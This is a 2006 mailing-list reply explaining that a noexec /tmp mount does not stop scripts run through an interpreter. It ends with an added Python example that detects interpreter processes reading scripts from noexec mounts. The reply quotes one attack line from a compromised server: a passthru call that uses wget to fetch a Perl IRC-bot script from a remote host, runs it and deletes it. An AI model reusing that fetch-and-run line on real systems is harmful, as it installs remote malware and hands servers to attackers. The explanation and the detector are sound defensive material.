Date:  Tue, 12 Sep 2006 15:15:12 -0400
From:  Kevin Bonner <keb (at mark) pa.net>
Subject:  [coba-e:06866] Re: /TMP Directory
To:  coba-e (at mark) bluequartz.org
Message-Id:  <200609121515.16088.keb (at mark) pa.net>
In-Reply-To:  <002701c6d450$c0c58480$6400a8c0@YOUR4105E587B6>
References:  <002701c6d450$c0c58480$6400a8c0@YOUR4105E587B6>
X-Mail-Count: 06866

On Saturday 09 September 2006 16:44, Darrell D. Mobley wrote:
>  passthru('cd /tmp;wget http://perqafohu.com/~armendibx/oki/v6.txt;perl
> v6.txt;rm -f v6*');
> [::snip::]
> The v6.txt is a Perl script that installs some IRC software and monitors
> IRC on open ports.  I do not think the script was successful in running,
> but I just want to make sure the /TMP security is enabled where files can't
> be run there.  While I don't think the DDOS attack was successful in
> running the script, it was successful in shutting down the server due to
> MySQL becoming overwhelmed.  Server load was up to 156!
>
> Any suggestions would be appreciated.

Having /tmp flags of noexec,nosuid helps against the clueless script kiddies,
but in your case it wouldn't prevent the code in v6.txt from being executed.

One example:

[root tmp]# mount | grep /tmp
/home/dev/tmpMnt on /home/tmp type ext2 (rw,noexec,nosuid,loop=/dev/loop0)
[root tmp]# pwd
/home/tmp
[root tmp]# ls -l hi.pl
-rw-r--r--    1 root     root           40 Sep 12 15:02 hi.pl
[root tmp]# cat hi.pl
#!/usr/bin/perl
print "Hello World!\n";
[root tmp]# perl hi.pl
Hello World!
[root tmp]#

My /tmp has noexec and yet I'm still able to execute the perl script.  This
is because the perl program is being executed (from /usr/bin/perl) and it's
interpreting the commands in the hi.pl file.  If I were to make hi.pl
executable and try to execute that file directly, it would be denied.

[root tmp]# chmod 755 hi.pl
[root tmp]# ls -l hi.pl
-rwxr-xr-x    1 root     root           40 Sep 12 15:02 hi.pl
[root tmp]# ./hi.pl
sh: ./hi.pl: Permission denied
[root tmp]#

Hopefully this helps you understand a little more about the capabilities and
limitations of the noexec flag on a mounted partition.

Kevin Bonner
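Added example, not part of the original message: because noexec does not stop `perl file`, one detection approach is to flag interpreter processes whose script sits on a noexec mount. The mount table, process list, interpreter list and function names below are constructed assumptions for illustration.

```python
import shlex
from pathlib import PurePosixPath

# Assumed interpreter names and inline-code flags; extend for your environment.
INTERPRETERS = {"perl", "python", "python3", "php", "ruby", "sh", "bash"}
INLINE_FLAGS = {"-e", "-c", "-r"}  # code passed on the command line, no script file

def parse_mounts(text):
    """Map mount point -> option set from /proc/mounts-format text."""
    mounts = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 4:
            mounts[PurePosixPath(fields[1])] = set(fields[3].split(","))
    return mounts

def on_noexec(path, mounts):
    """True if the deepest mount point containing path carries noexec."""
    covering = [m for m in mounts if m == path or m in path.parents]
    return bool(covering) and "noexec" in mounts[max(covering, key=lambda m: len(m.parts))]

def flag_interpreted(procs, mounts):
    """Return (pid, script) for interpreters reading a script from a noexec mount."""
    findings = []
    for pid, cwd, cmdline in procs:
        argv = shlex.split(cmdline)
        name = PurePosixPath(argv[0]).name if argv else ""
        if name not in INTERPRETERS or INLINE_FLAGS & set(argv):
            continue
        script = next((a for a in argv[1:] if not a.startswith("-")), "")
        full = PurePosixPath(cwd) / script  # an absolute script path replaces cwd
        if script and on_noexec(full, mounts):
            findings.append((pid, str(full)))
    return findings

# Constructed sample data: mount table and (pid, cwd, command line) tuples.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext3 rw 0 0
/dev/loop0 /home/tmp ext2 rw,noexec,nosuid 0 0
tmpfs /tmp tmpfs rw,noexec,nosuid,nodev 0 0
"""
SAMPLE_PROCS = [
    (4101, "/tmp", "perl v6.txt"),
    (4102, "/home/tmp", "/usr/bin/perl hi.pl"),
    (4103, "/root", "perl /usr/local/bin/report.pl"),
    (4104, "/tmp", "perl -e 'print 1'"),
]

if __name__ == "__main__":
    print(flag_interpreted(SAMPLE_PROCS, parse_mounts(SAMPLE_MOUNTS)))
```

On a live host the same inputs would come from /proc/mounts and each process's command line and working directory.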